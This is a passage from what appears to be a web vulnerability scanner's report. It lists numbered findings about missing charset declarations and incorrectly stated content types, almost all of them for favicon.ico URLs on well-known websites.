24.474. http://www.latimes.com/favicon.ico
24.475. http://www.legacy.com/favicon.ico
24.476. http://www.letssingit.com/favicon.ico
24.477. http://www.levi.com/favicon.ico
24.478. http://www.lg.com/favicon.ico
24.479. http://www.life123.com/favicon.ico
24.480. http://www.lifescript.com/favicon.ico
24.481. http://www.lijit.com/favicon.ico
24.482. http://www.like.com/favicon.ico
24.483. http://www.lingospot.com/favicon.ico
24.484. http://www.linkedin.com/favicon.ico
24.485. http://www.liutilities.com/favicon.ico
24.486. http://www.livecams.com/favicon.ico
24.487. http://www.livejournal.com/favicon.ico
24.488. http://www.livenation.com/favicon.ico
24.489. http://www.llbean.com/favicon.ico
24.490. http://www.loc.gov/favicon.ico
24.491. http://www.local.com/favicon.ico
24.492. http://www.localguides.com/favicon.ico
24.493. http://www.localpages.com/favicon.ico
24.494. http://www.lowermybills.com/favicon.ico
24.495. http://www.lowes.com/favicon.ico
24.496. http://www.lowfares.com/favicon.ico
24.497. http://www.lyrics007.com/favicon.ico
24.498. http://www.lyricsmode.com/favicon.ico
24.499. http://www.macraesbluebook.com/favicon.ico
24.500. http://www.macrumors.com/favicon.ico
24.501. http://www.macys.com/favicon.ico
24.502. http://www.made-in-china.com/favicon.ico
24.503. http://www.mail.com/favicon.ico
24.504. http://www.mainstreet.com/favicon.ico
24.505. http://www.manualsonline.com/favicon.ico
24.506. http://www.mapquest.com/favicon.ico
24.507. http://www.mapsofworld.com/favicon.ico
24.508. http://www.marriott.com/favicon.ico
24.509. http://www.marthastewart.com/favicon.ico
24.510. http://www.marykay.com/favicon.ico
24.511. http://www.mastercard.com/favicon.ico
24.512. http://www.match.com/favicon.ico
24.513. http://www.mate1.net/favicon.ico
24.514. http://www.maxim.com/favicon.ico
24.515. http://www.mayoclinic.com/favicon.ico
24.516. http://www.mcafee.com/favicon.ico
24.517. http://www.medcohealth.com/favicon.ico
24.518. http://www.mediaite.com/favicon.ico
24.519. http://www.medicalnewstoday.com/favicon.ico
24.520. http://www.medicare.gov/favicon.ico
24.521. http://www.medscape.com/favicon.ico
24.522. http://www.meebo.com/favicon.ico
24.523. http://www.meetlocals.com/favicon.ico
24.524. http://www.meetup.com/favicon.ico
24.525. http://www.megaupload.com/favicon.ico
24.526. http://www.menshealth.com/favicon.ico
24.527. http://www.menuism.com/favicon.ico
24.528. http://www.menupages.com/favicon.ico
24.529. http://www.merchantcircle.com/favicon.ico
24.530. http://www.merck.com/favicon.ico
24.531. http://www.mercola.com/favicon.ico
24.532. http://www.metacafe.com/favicon.ico
24.533. http://www.metafilter.com/favicon.ico
24.534. http://www.metrolyrics.com/favicon.ico
24.535. http://www.metromix.com/favicon.ico
24.536. http://www.metropcs.com/favicon.ico
24.537. http://www.mgid.com/favicon.ico
24.538. http://www.miamiherald.com/favicon.ico
24.539. http://www.michaels.com/favicon.ico
24.540. http://www.michigan.gov/favicon.ico
24.541. http://www.microsofttranslator.com/favicon.ico
24.542. http://www.military.com/favicon.ico
24.543. http://www.mindjolt.com/favicon.ico
24.544. http://www.miracleworkers.com/favicon.ico
24.545. http://www.mlb.com/favicon.ico
24.546. http://www.mlive.com/favicon.ico
24.547. http://www.mocospace.com/favicon.ico
24.548. http://www.modelmayhem.com/favicon.ico
24.549. http://www.momswhothink.com/favicon.ico
24.550. http://www.moviesunlimited.com/favicon.ico
24.551. http://www.movietickets.com/favicon.ico
24.552. http://www.mozilla.com/favicon.ico
24.553. http://www.mp3lyrics.org/favicon.ico
24.554. http://www.mp3raid.com/favicon.ico
24.555. http://www.mrmovietimes.com/favicon.ico
24.556. http://www.msnbc.com/favicon.ico
24.557. http://www.mtv.com/favicon.ico
24.558. http://www.multimap.com/favicon.ico
24.559. http://www.musiciansfriend.com/favicon.ico
24.560. http://www.mybloglog.com/favicon.ico
24.561. http://www.mycokerewards.com/favicon.ico
24.562. http://www.mycricket.com/favicon.ico
24.563. http://www.myheritage.com/favicon.ico
24.564. http://www.mylife.com/favicon.ico
24.565. http://www.mylifetime.com/favicon.ico
24.566. http://www.mynewplace.com/favicon.ico
24.567. http://www.mysanantonio.com/favicon.ico
24.568. http://www.myspace.com/favicon.ico
24.569. http://www.mystart.com/favicon.ico
24.570. http://www.myxer.com/favicon.ico
24.571. http://www.myyearbook.com/favicon.ico
24.572. http://www.nadaguides.com/favicon.ico
24.573. http://www.nasa.gov/favicon.ico
24.574. http://www.nationalgeographic.com/favicon.ico
24.575. http://www.navy.mil/favicon.ico
24.576. http://www.nba.com/favicon.ico
24.577. http://www.nbc.com/favicon.ico
24.578. http://www.nbcnewyork.com/favicon.ico
24.579. http://www.ncm.com/favicon.ico
24.580. http://www.netflix.com/favicon.ico
24.581. http://www.netquote.com/favicon.ico
24.582. http://www.netsuite.com/favicon.ico
24.583. http://www.newegg.com/favicon.ico
24.584. http://www.newgrounds.com/favicon.ico
24.585. http://www.newport-news.com/favicon.ico
24.586. http://www.newsbucket.co.uk/favicon.ico
24.587. http://www.newser.com/favicon.ico
24.588. http://www.newsinc.com/favicon.ico
24.589. http://www.newsmax.com/favicon.ico
24.590. http://www.newsok.com/favicon.ico
24.591. http://www.newsvine.com/favicon.ico
24.592. http://www.newsweek.com/favicon.ico
24.593. http://www.nextel.com/favicon.ico
24.594. http://www.nextinsure.com/favicon.ico
24.595. http://www.nfl.com/favicon.ico
24.596. http://www.nhl.com/favicon.ico
24.597. http://www.nickjr.com/favicon.ico
24.598. http://www.nih.gov/favicon.ico
24.599. http://www.nike.com/favicon.ico
24.600. http://www.nintendo.com/favicon.ico
24.601. http://www.nola.com/favicon.ico
24.602. http://www.northerntool.com/favicon.ico
24.603. http://www.notebookreview.com/favicon.ico
24.604. http://www.npr.org/favicon.ico
24.605. http://www.nps.gov/favicon.ico
24.606. http://www.nwsource.com/favicon.ico
24.607. http://www.nydailynews.com/favicon.ico
24.608. http://www.nypost.com/favicon.ico
24.609. http://www.nytimes.com/favicon.ico
24.610. http://www.ocregister.com/favicon.ico
24.611. http://www.octonet.com/favicon.ico
24.612. http://www.officedepot.com/favicon.ico
24.613. http://www.officemax.com/favicon.ico
24.614. http://www.olivegarden.com/favicon.ico
24.615. http://www.onemanga.com/favicon.ico
24.616. http://www.onlywire.com/favicon.ico
24.617. http://www.oodle.com/favicon.ico
24.618. http://www.opentable.com/favicon.ico
24.619. http://www.opera.com/favicon.ico
24.620. http://www.opinionlab.com/favicon.ico
24.621. http://www.opm.gov/favicon.ico
24.622. http://www.opportunity.co/favicon.ico
24.623. http://www.oprah.com/favicon.ico
24.624. http://www.oracle.com/favicon.ico
24.625. http://www.orbitz.com/favicon.ico
24.626. http://www.orchardbank.com/favicon.ico
24.627. http://www.oregonlive.com/favicon.ico
24.628. http://www.orientaltrading.com/favicon.ico
24.629. http://www.ourstage.com/favicon.ico
24.630. http://www.overstock.com/favicon.ico
24.631. http://www.ovguide.com/favicon.ico
24.632. http://www.parenting.com/favicon.ico
24.633. http://www.parentsconnect.com/favicon.ico
24.634. http://www.partstore.com/favicon.ico
24.635. http://www.partypoker.com/favicon.ico
24.636. http://www.payless.com/favicon.ico
24.637. http://www.paypal.com/favicon.ico
24.638. http://www.pbs.org/favicon.ico
24.639. http://www.pchlotto.com/favicon.ico
24.640. http://www.pcmag.com/favicon.ico
24.641. http://www.pctools.com/favicon.ico
24.642. http://www.pcworld.com/favicon.ico
24.643. http://www.people.com/favicon.ico
24.644. http://www.peoplefinders.com/favicon.ico
24.645. http://www.peopleofwalmart.com/favicon.ico
24.646. http://www.peoplestylewatch.com/favicon.ico
24.647. http://www.petco.com/favicon.ico
24.648. http://www.petfinder.com/favicon.ico
24.649. http://www.petside.com/favicon.ico
24.650. http://www.petsmart.com/favicon.ico
24.651. http://www.pga.com/favicon.ico
24.652. http://www.pgatour.com/favicon.ico
24.653. http://www.philly.com/favicon.ico
24.654. http://www.phoenix.edu/favicon.ico
24.655. http://www.pickyourown.org/favicon.ico
24.656. http://www.picnik.com/favicon.ico
24.657. http://www.picsearch.com/favicon.ico
24.658. http://www.pillsbury.com/favicon.ico
24.659. http://www.pipl.com/favicon.ico
24.660. http://www.pittsburghlive.com/favicon.ico
24.661. http://www.playdom.com/favicon.ico
24.662. http://www.playfin.com/favicon.ico
24.663. http://www.pnc.com/favicon.ico
24.664. http://www.pogo.com/favicon.ico
24.665. http://www.pokerstars.com/favicon.ico
24.666. http://www.politico.com/favicon.ico
24.667. http://www.politicsdaily.com/favicon.ico
24.668. http://www.pollmonkey.com/favicon.ico
24.669. http://www.polyvore.com/favicon.ico
24.670. http://www.popcap.com/favicon.ico
24.671. http://www.poptropica.com/favicon.ico
24.672. http://www.popularscreensavers.com/favicon.ico
24.673. http://www.potterybarn.com/favicon.ico
24.674. http://www.pricegong.com/favicon.ico
24.675. http://www.primarygames.com/favicon.ico
24.676. http://www.prlog.org/favicon.ico
24.677. http://www.progressive.com/favicon.ico
24.678. http://www.pronto.com/favicon.ico
24.679. http://www.psu.edu/favicon.ico
24.680. http://www.publicrecords.com/favicon.ico
24.681. http://www.purdue.edu/favicon.ico
24.682. http://www.purplemath.com/favicon.ico
24.683. http://www.qualityhealth.com/favicon.ico
24.684. http://www.qualtrics.com/favicon.ico
24.685. http://www.questia.com/favicon.ico
24.686. http://www.quotegarden.com/favicon.ico
24.687. http://www.qwest.com/favicon.ico
24.688. http://www.radioshack.com/favicon.ico
24.689. http://www.rawtube.com/favicon.ico
24.690. http://www.reachlocal.com/favicon.ico
24.691. http://www.realage.com/favicon.ico
24.692. http://www.realsimple.com/favicon.ico
24.693. http://www.realtor.com/favicon.ico
24.694. http://www.redbox.com/favicon.ico
24.695. http://www.reddit.com/favicon.ico
24.696. http://www.redorbit.com/favicon.ico
24.697. http://www.reference.com/favicon.ico
24.698. http://www.regions.com/favicon.ico
24.699. http://www.registrydefender.com/favicon.ico
24.700. http://www.rei.com/favicon.ico
24.701. http://www.rent.com/favicon.ico
24.702. http://www.rentals.com/favicon.ico
24.703. http://www.reply.com/favicon.ico
24.704. http://www.retailmenot.com/favicon.ico
24.705. http://www.retrevo.com/favicon.ico
24.706. http://www.reuters.com/favicon.ico
24.707. http://www.ripoffreport.com/favicon.ico
24.708. http://www.riteaid.com/favicon.ico
24.709. http://www.rivals.com/favicon.ico
24.710. http://www.rollingstone.com/favicon.ico
24.711. http://www.rotoworld.com/favicon.ico
24.712. http://www.rottentomatoes.com/favicon.ico
24.713. http://www.roxwel.com/favicon.ico
24.714. http://www.rr.com/favicon.ico
24.715. http://www.rss2search.com/favicon.ico
24.716. http://www.runescape.com/favicon.ico
24.717. http://www.sacbee.com/favicon.ico
24.718. http://www.safeway.com/favicon.ico
24.719. http://www.salesforce.com/favicon.ico
24.720. http://www.salon.com/favicon.ico
24.721. http://www.samsclub.com/favicon.ico
24.722. http://www.savings.com/favicon.ico
24.723. http://www.sbnation.com/favicon.ico
24.724. http://www.scholastic.com/favicon.ico
24.725. http://www.sciencedaily.com/favicon.ico
24.726. http://www.scottrade.com/favicon.ico
24.727. http://www.scout.com/favicon.ico
24.728. http://www.scribd.com/favicon.ico
24.729. http://www.sears.com/favicon.ico
24.730. http://www.seattlepi.com/favicon.ico
24.731. http://www.sendspace.com/favicon.ico
24.732. http://www.seniorpeoplemeet.com/favicon.ico
24.733. http://www.sephora.com/favicon.ico
24.734. http://www.sfgate.com/favicon.ico
24.735. http://www.shangri-la.com/favicon.ico
24.736. http://www.sharebuilder.com/favicon.ico
24.737. http://www.shockwave.com/favicon.ico
24.738. http://www.shoebuy.com/favicon.ico
24.739. http://www.shop.com/favicon.ico
24.740. http://www.shopathome.com/favicon.ico
24.741. http://www.shopcompanion.com/favicon.ico
24.742. http://www.shopping.com/favicon.ico
24.743. http://www.shopstyle.com/favicon.ico
24.744. http://www.shopzilla.com/favicon.ico
24.745. http://www.shutterfly.com/favicon.ico
24.746. http://www.simon.com/favicon.ico
24.747. http://www.simplyhired.com/favicon.ico
24.748. http://www.sing365.com/favicon.ico
24.749. http://www.singlesnet.com/favicon.ico
24.750. http://www.sky.com/favicon.ico
24.751. http://www.skype.com/favicon.ico
24.752. http://www.slate.com/favicon.ico
24.753. http://www.slide.com/favicon.ico
24.754. http://www.slideshare.net/favicon.ico
24.755. http://www.smarter.com/favicon.ico
24.756. http://www.smilebox.com/favicon.ico
24.757. http://www.smugmug.com/favicon.ico
24.758. http://www.snagajob.com/favicon.ico
24.759. http://www.snapfish.com/favicon.ico
24.760. http://www.socialsecurity.gov/favicon.ico
24.761. http://www.sodahead.com/favicon.ico
24.762. http://www.soft32.com/favicon.ico
24.763. http://www.soft82.com/favicon.ico
24.764. http://www.softonic.com/favicon.ico
24.765. http://www.softpedia.com/favicon.ico
24.766. http://www.songlyrics.com/favicon.ico
24.767. http://www.sony.com/favicon.ico
24.768. http://www.southwest.com/favicon.ico
24.769. http://www.spanishdict.com/favicon.ico
24.770. http://www.sparkpeople.com/favicon.ico
24.771. http://www.spellingcity.com/favicon.ico
24.772. http://www.spike.com/favicon.ico
24.773. http://www.spokeo.com/favicon.ico
24.774. http://www.sportsauthority.com/favicon.ico
24.775. http://www.sportsmansguide.com/favicon.ico
24.776. http://www.sportsnetwork.com/favicon.ico
24.777. http://www.springerlink.com/favicon.ico
24.778. http://www.sprint.com/favicon.ico
24.779. http://www.squidoo.com/favicon.ico
24.780. http://www.ssa.gov/favicon.ico
24.781. http://www.stanford.edu/favicon.ico
24.782. http://www.star-telegram.com/favicon.ico
24.783. http://www.starpulse.com/favicon.ico
24.784. http://www.startribune.com/favicon.ico
24.785. http://www.state.gov/favicon.ico
24.786. http://www.state.tn.us/favicon.ico
24.787. http://www.statefarm.com/favicon.ico
24.788. http://www.stateuniversity.com/favicon.ico
24.789. http://www.steadyhealth.com/favicon.ico
24.790. http://www.stltoday.com/favicon.ico
24.791. http://www.stlyrics.com/favicon.ico
24.792. http://www.stumbleupon.com/favicon.ico
24.793. http://www.stylelist.com/favicon.ico
24.794. http://www.suite101.com/favicon.ico
24.795. http://www.suntimes.com/favicon.ico
24.796. http://www.superiorpics.com/favicon.ico
24.797. http://www.superpages.com/favicon.ico
24.798. http://www.symantec.com/favicon.ico
24.799. http://www.t-mobile.com/favicon.ico
24.800. http://www.tagged.com/favicon.ico
24.801. http://www.talkingpointsmemo.com/favicon.ico
24.802. http://www.tampabay.com/favicon.ico
24.803. http://www.target.com/favicon.ico
24.804. http://www.tastebook.com/favicon.ico
24.805. http://www.techbargains.com/favicon.ico
24.806. http://www.telegraph.co.uk/favicon.ico
24.807. http://www.terra.com/favicon.ico
24.808. http://www.textsfromlastnight.com/favicon.ico
24.809. http://www.theatlantic.com/favicon.ico
24.810. http://www.thedailybeast.com/favicon.ico
24.811. http://www.thedailyshow.com/favicon.ico
24.812. http://www.thedietsolutionprogram.com/favicon.ico
24.813. http://www.theepochtimes.com/favicon.ico
24.814. http://www.thefind.com/favicon.ico
24.815. http://www.thefreedictionary.com/favicon.ico
24.816. http://www.thefreelibrary.com/favicon.ico
24.817. http://www.thefrisky.com/favicon.ico
24.818. http://www.theglobeandmail.com/favicon.ico
24.819. http://www.theonion.com/favicon.ico
24.820. http://www.thesaurus.com/favicon.ico
24.821. http://www.thirdage.com/favicon.ico
24.822. http://www.thisis50.com/favicon.ico
24.823. http://www.thisoldhouse.com/favicon.ico
24.824. http://www.thomasnet.com/favicon.ico
24.825. http://www.thriftyfun.com/favicon.ico
24.826. http://www.ticketmaster.com/favicon.ico
24.827. http://www.tickets.com/favicon.ico
24.828. http://www.ticketsnow.com/favicon.ico
24.829. http://www.tigerdirect.com/favicon.ico
24.830. http://www.time.com/favicon.ico
24.831. http://www.timeanddate.com/favicon.ico
24.832. http://www.timewarnercable.com/favicon.ico
24.833. http://www.tinypic.com/favicon.ico
24.834. http://www.tmz.com/favicon.ico
24.835. http://www.tomshardware.com/favicon.ico
24.836. http://www.topix.com/favicon.ico
24.837. http://www.topix.net/favicon.ico
24.838. http://www.topshareware.com/favicon.ico
24.839. http://www.toptenreviews.com/favicon.ico
24.840. http://www.totalbeauty.com/favicon.ico
24.841. http://www.townhall.com/favicon.ico
24.842. http://www.toyota.com/favicon.ico
24.843. http://www.toysrus.com/favicon.ico
24.844. http://www.trafficrevenue.net/favicon.ico
24.845. http://www.trails.com/favicon.ico
24.846. http://www.travel-ticker.com/favicon.ico
24.847. http://www.travelocity.com/favicon.ico
24.848. http://www.travelpod.com/favicon.ico
24.849. http://www.travelzoo.com/favicon.ico
24.850. http://www.trendmicro.com/favicon.ico
24.851. http://www.tripadvisor.com/favicon.ico
24.852. http://www.tripzen.com/favicon.ico
24.853. http://www.true.com/favicon.ico
24.854. http://www.trulia.com/favicon.ico
24.855. http://www.truste.com/favicon.ico
24.856. http://www.tv.com/favicon.ico
24.857. http://www.tvguide.com/favicon.ico
24.858. http://www.tvtxtr.com/favicon.ico
24.859. http://www.ucomparehealthcare.com/favicon.ico
24.860. http://www.ufc.com/favicon.ico
24.861. http://www.uhaul.com/favicon.ico
24.862. http://www.ultimate-guitar.com/favicon.ico
24.863. http://www.umich.edu/favicon.ico
24.864. http://www.univision.com/favicon.ico
24.865. http://www.ups.com/favicon.ico
24.866. http://www.uptake.com/favicon.ico
24.867. http://www.urbanspoon.com/favicon.ico
24.868. http://www.usa-people-search.com/favicon.ico
24.869. http://www.usajobs.gov/favicon.ico
24.870. http://www.usatoday.com/favicon.ico
24.871. http://www.usbank.com/favicon.ico
24.872. http://www.use.com/favicon.ico
24.873. http://www.usgs.gov/favicon.ico
24.874. http://www.usmagazine.com/favicon.ico
24.875. http://www.usps.com/favicon.ico
24.876. http://www.ussearch.com/favicon.ico
24.877. http://www.ustream.tv/favicon.ico
24.878. http://www.utorrent.com/favicon.ico
24.879. http://www.va.gov/favicon.ico
24.880. http://www.vanguard.com/favicon.ico
24.881. http://www.vast.com/favicon.ico
24.882. http://www.veoh.com/favicon.ico
24.883. http://www.verisign.com/favicon.ico
24.884. http://www.vh1.com/favicon.ico
24.885. http://www.victoriassecret.com/favicon.ico
24.886. http://www.videobash.com/favicon.ico
24.887. http://www.videojug.com/favicon.ico
24.888. http://www.videosurf.com/favicon.ico
24.889. http://www.viewpoints.com/favicon.ico
24.890. http://www.villagevoice.com/favicon.ico
24.891. http://www.vimeo.com/favicon.ico
24.892. http://www.virginia.gov/favicon.ico
24.893. http://www.virginmobileusa.com/favicon.ico
24.894. http://www.vistaprint.com/favicon.ico
24.895. http://www.vitals.com/favicon.ico
24.896. http://www.vrbo.com/favicon.ico
24.897. http://www.walgreens.com/favicon.ico
24.898. http://www.walletpop.com/favicon.ico
24.899. http://www.walmart.com/favicon.ico
24.900. http://www.wapedia.mobi/favicon.ico
24.901. http://www.warnerbros.com/favicon.ico
24.902. http://www.washingtonpost.com/favicon.ico
24.903. http://www.weather.com/favicon.ico
24.904. http://www.weather.gov/favicon.ico
24.905. http://www.weatherbug.com/favicon.ico
24.906. http://www.webcrawler.com/favicon.ico
24.907. http://www.webgains.com/favicon.ico
24.908. http://www.webmd.com/favicon.ico
24.909. http://www.webring.org/favicon.ico
24.910. http://www.webs.com/favicon.ico
24.911. http://www.webshots.com/favicon.ico
24.912. http://www.weightwatchers.com/favicon.ico
24.913. http://www.wellness.com/favicon.ico
24.914. http://www.wellsfargo.com/favicon.ico
24.915. http://www.wendys.com/favicon.ico
24.916. http://www.wetpaint.com/favicon.ico
24.917. http://www.where2getit.com/favicon.ico
24.918. http://www.whitepages.com/favicon.ico
24.919. http://www.wikia.com/favicon.ico
24.920. http://www.wikimapia.org/favicon.ico
24.921. http://www.wikimedia.org/favicon.ico
24.922. http://www.wikio.com/favicon.ico
24.923. http://www.wimp.com/favicon.ico
24.924. http://www.winbuyer.com/favicon.ico
24.925. http://www.wired.com/favicon.ico
24.926. http://www.wisegeek.com/favicon.ico
24.927. http://www.wix.com/favicon.ico
24.928. http://www.womansday.com/favicon.ico
24.929. http://www.wonderhowto.com/favicon.ico
24.930. http://www.worldwinner.com/favicon.ico
24.931. http://www.worthpoint.com/favicon.ico
24.932. http://www.wowhead.com/favicon.ico
24.933. http://www.wowwiki.com/favicon.ico
24.934. http://www.wsbtv.com/favicon.ico
24.935. http://www.wunderground.com/favicon.ico
24.936. http://www.wwe.com/favicon.ico
24.937. http://www.xanga.com/favicon.ico
24.938. http://www.xe.com/favicon.ico
24.939. http://www.yakaz.com/favicon.ico
24.940. http://www.yallwire.com/favicon.ico
24.941. http://www.yardbarker.com/favicon.ico
24.942. http://www.yellow.com/favicon.ico
24.943. http://www.yellowbook.com/favicon.ico
24.944. http://www.yellowpages.com/favicon.ico
24.945. http://www.yelp.com/favicon.ico
24.946. http://www.yidio.com/favicon.ico
24.947. http://www.younghollywood.com/favicon.ico
24.948. http://www.yourdictionary.com/favicon.ico
24.949. http://www.yourfilehost.com/favicon.ico
24.950. http://www.yuku.com/favicon.ico
24.951. http://www.zabasearch.com/favicon.ico
24.952. http://www.zap2it.com/favicon.ico
24.953. http://www.zappos.com/favicon.ico
24.954. http://www.zazzle.com/favicon.ico
24.955. http://www.zillow.com/favicon.ico
24.956. http://www.zimbio.com/favicon.ico
24.957. http://www.ziprealty.com/favicon.ico
24.958. http://www.zmags.com/favicon.ico
24.959. http://www.zoosk.com/favicon.ico
24.960. http://www.zshare.net/favicon.ico
24.961. http://www.zvents.com/favicon.ico
24.962. http://www.zynga.com/favicon.ico
25. HTML does not specify charset
25.1. https://activresa-secure2.icor.fr/
25.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27
25.3. http://fls.doubleclick.net/activityi
25.4. http://www.avast.com/favicon.ico
25.5. http://www.billsnitzer.com/favicon.ico
25.6. http://www.cheetahmail.com/favicon.ico
25.7. http://www.chinaontv.com/favicon.ico
25.8. http://www.citibank.com/favicon.ico
25.9. http://www.cobaltnitra.com/favicon.ico
25.10. http://www.coolmath.com/favicon.ico
25.11. http://www.coolmath4kids.com/favicon.ico
25.12. http://www.crocoads.com/favicon.ico
25.13. http://www.drudgereport.com/favicon.ico
25.14. http://www.dt00.net/favicon.ico
25.15. http://www.ehow.co.uk/favicon.ico
25.16. http://www.elyricsworld.com/favicon.ico
25.17. http://www.epinions.com/favicon.ico
25.18. http://www.fark.com/favicon.ico
25.19. http://www.firecue.com/favicon.ico
25.20. http://www.freedownloadscenter.com/favicon.ico
25.21. http://www.freeze.com/favicon.ico
25.22. http://www.hbo.com/favicon.ico
25.23. http://www.iloveindia.com/favicon.ico
25.24. http://www.intuit.com/favicon.ico
25.25. http://www.iwin.com/favicon.ico
25.26. http://www.lingospot.com/favicon.ico
25.27. http://www.moviesunlimited.com/favicon.ico
25.28. http://www.music-oasis.com/favicon.ico
25.29. http://www.olpinhoopes.com/favicon.ico
25.30. http://www.rmloader.com/favicon.ico
25.31. http://www.samsung.com/favicon.ico
25.32. http://www.socialsurveys.us/favicon.ico
25.33. http://www.sparkstudios.com/favicon.ico
25.34. http://www.springerlink.com/favicon.ico
25.35. http://www.swagbucks.com/favicon.ico
25.36. http://www.thegrids.info/favicon.ico
25.37. http://www.tidaltv.com/favicon.ico
25.38. http://www.trafficrevenue.net/favicon.ico
25.39. http://www.verisign.com/favicon.ico
25.40. http://www.verizon.net/favicon.ico
25.41. http://www.woot.com/favicon.ico
25.42. http://www.xe.com/favicon.ico
25.43. http://www.y8.com/favicon.ico
25.44. http://www.yfrog.com/favicon.ico
26. HTML uses unrecognised charset
27. Content type incorrectly stated
27.1. http://www.123greetings.com/favicon.ico
27.2. http://www.2wire.net/favicon.ico
27.3. http://www.43things.com/favicon.ico
27.4. http://www.6waves.com/favicon.ico
27.5. http://www.aa.com/favicon.ico
27.6. http://www.aarp.org/favicon.ico
27.7. http://www.ad4game.com/favicon.ico
27.8. http://www.alibaba.com/favicon.ico
27.9. http://www.alibris.com/favicon.ico
27.10. http://www.allbusiness.com/favicon.ico
27.11. http://www.allvoices.com/favicon.ico
27.12. http://www.alphadictionary.com/favicon.ico
27.13. http://www.americantowns.com/favicon.ico
27.14. http://www.andiesisle.com/favicon.ico
27.15. http://www.andkon.com/favicon.ico
27.16. http://www.apartmenthomeliving.com/favicon.ico
27.17. http://www.apartmentratings.com/favicon.ico
27.18. http://www.arizona.edu/favicon.ico
27.19. http://www.aroundme.com/favicon.ico
27.20. http://www.articlesbase.com/favicon.ico
27.21. http://www.ask.com/favicon.ico
27.22. http://www.astrology.com/favicon.ico
27.23. http://www.autozone.com/favicon.ico
27.24. http://www.avast.com/favicon.ico
27.25. http://www.babelgum.com/favicon.ico
27.26. http://www.bankofamerica.com/favicon.ico
27.27. http://www.beezid.com/favicon.ico
27.28. http://www.blucigs.com/favicon.ico
27.29. http://www.blurtit.com/favicon.ico
27.30. http://www.boingboing.net/favicon.ico
27.31. http://www.bravotv.com/favicon.ico
27.32. http://www.breitbart.com/favicon.ico
27.33. http://www.buzzillions.com/favicon.ico
27.34. http://www.cabelas.com/favicon.ico
27.35. http://www.caringbridge.org/favicon.ico
27.36. http://www.cbc.ca/favicon.ico
27.37. http://www.celebrity-gossip.net/favicon.ico
27.38. http://www.census.gov/favicon.ico
27.39. http://www.chilisemailclub.com/favicon.ico
27.40. http://www.chuckecheese.com/favicon.ico
27.41. http://www.cincinnati.com/favicon.ico
27.42. http://www.city-data.com/favicon.ico
27.43. http://www.clocklink.com/favicon.ico
27.44. http://www.clubpenguin.com/favicon.ico
27.45. http://www.cnsnews.com/favicon.ico
27.46. http://www.collegeboard.com/favicon.ico
27.47. http://www.collegeconfidential.com/favicon.ico
27.48. http://www.comedycentral.com/favicon.ico
27.49. http://www.complaintsboard.com/favicon.ico
27.50. http://www.contactmusic.com/favicon.ico
27.51. http://www.craigslist.ca/favicon.ico
27.52. http://www.craigslist.org/favicon.ico
27.53. http://www.craveonline.com/favicon.ico
27.54. http://www.cyberdefender.com/favicon.ico
27.55. http://www.datpiff.com/favicon.ico
27.56. http://www.denverpost.com/favicon.ico
27.57. http://www.detiva.com/favicon.ico
27.58. http://www.diablomedia.com/favicon.ico
27.59. http://www.directbuyvisitorpass.com/favicon.ico
27.60. http://www.doityourself.com/favicon.ico
27.61. http://www.dreamstime.com/favicon.ico
27.62. http://www.driverside.com/favicon.ico
27.63. http://www.eatingwell.com/favicon.ico
27.64. http://www.ebaumsworld.com/favicon.ico
27.65. http://www.economist.com/favicon.ico
27.66. http://www.ed.gov/favicon.ico
27.67. http://www.egotastic.com/favicon.ico
27.68. http://www.ehealthforum.com/favicon.ico
27.69. http://www.ehow.co.uk/favicon.ico
27.70. http://www.epicurious.com/favicon.ico
27.71. http://www.epinions.com/favicon.ico
27.72. http://www.examiner.com/favicon.ico
27.73. http://www.ezanga.com/favicon.ico
27.74. http://www.familybuilder.com/favicon.ico
27.75. http://www.fantage.com/favicon.ico
27.76. http://www.faqs.org/favicon.ico
27.77. http://www.fastcompany.com/favicon.ico
27.78. http://www.fetedoris.com/favicon.ico
27.79. http://www.filestube.com/favicon.ico
27.80. http://www.findagrave.com/favicon.ico
27.81. http://www.finishline.com/favicon.ico
27.82. http://www.flixster.com/favicon.ico
27.83. http://www.food.com/favicon.ico
27.84. http://www.fortunecity.com/favicon.ico
27.85. http://www.freecause.com/favicon.ico
27.86. http://www.freeonlinegames.com/favicon.ico
27.87. http://www.freeze.com/favicon.ico
27.88. http://www.freshdeals.com/favicon.ico
27.89. http://www.funbrain.com/favicon.ico
27.90. http://www.gamehouse.com/favicon.ico
27.91. http://www.gamevance.com/favicon.ico
27.92. http://www.gamewinners.com/favicon.ico
27.93. http://www.gardenweb.com/favicon.ico
27.94. http://www.genealogy.com/favicon.ico
27.95. http://www.gossipcenter.com/favicon.ico
27.96. http://www.gourmandia.com/favicon.ico
27.97. http://www.greenwichmeantime.com/favicon.ico
27.98. http://www.harvard.edu/favicon.ico
27.99. http://www.hiexpress.com/favicon.ico
27.100. http://www.holidayinn.com/favicon.ico
27.101. http://www.hollywoodreporter.com/favicon.ico
27.102. http://www.home-remedies-for-you.com/favicon.ico
27.103. http://www.ichotelsgroup.com/favicon.ico
27.104. http://www.imagevenue.com/favicon.ico
27.105. http://www.inc.com/favicon.ico
27.106. http://www.infomash.org/favicon.ico
27.107. http://www.infowars.com/favicon.ico
27.108. http://www.ivillage.com/favicon.ico
27.109. http://www.jango.com/favicon.ico
27.110. http://www.jcwhitney.com/favicon.ico
27.111. http://www.joann.com/favicon.ico
27.112. http://www.jobsonline.net/favicon.ico
27.113. http://www.justia.com/favicon.ico
27.114. http://www.justluxe.com/favicon.ico
27.115. http://www.k12.com/favicon.ico
27.116. http://www.kazaa.com/favicon.ico
27.117. http://www.kcom.com/favicon.ico
27.118. http://www.kcom.com/favicon1.ico
27.119. http://www.kickapps.com/favicon.ico
27.120. http://www.lijit.com/favicon.ico
27.121. http://www.livevideo.com/favicon.ico
27.122. http://www.localpages.com/favicon.ico
27.123. http://www.localschooldirectory.com/favicon.ico
27.124. http://www.lowfares.com/favicon.ico
27.125. http://www.lunka.com/favicon.ico
27.126. http://www.mac.com/favicon.ico
27.127. http://www.maniatv.com/favicon.ico
27.128. http://www.mediaite.com/favicon.ico
27.129. http://www.medicalnewstoday.com/favicon.ico
27.130. http://www.mercurynews.com/favicon.ico
27.131. http://www.michigan.gov/favicon.ico
27.132. http://www.military.com/favicon.ico
27.133. http://www.miniclip.com/favicon.ico
27.134. http://www.mlive.com/favicon.ico
27.135. http://www.mochila.com/favicon.ico
27.136. http://www.music-oasis.com/favicon.ico
27.137. http://www.musiciansfriend.com/favicon.ico
27.138. http://www.myheritage.com/favicon.ico
27.139. http://www.mylifetime.com/favicon.ico
27.140. http://www.mylocalemployment.net/favicon.ico
27.141. http://www.mystart.com/favicon.ico
27.142. http://www.nationalreview.com/favicon.ico
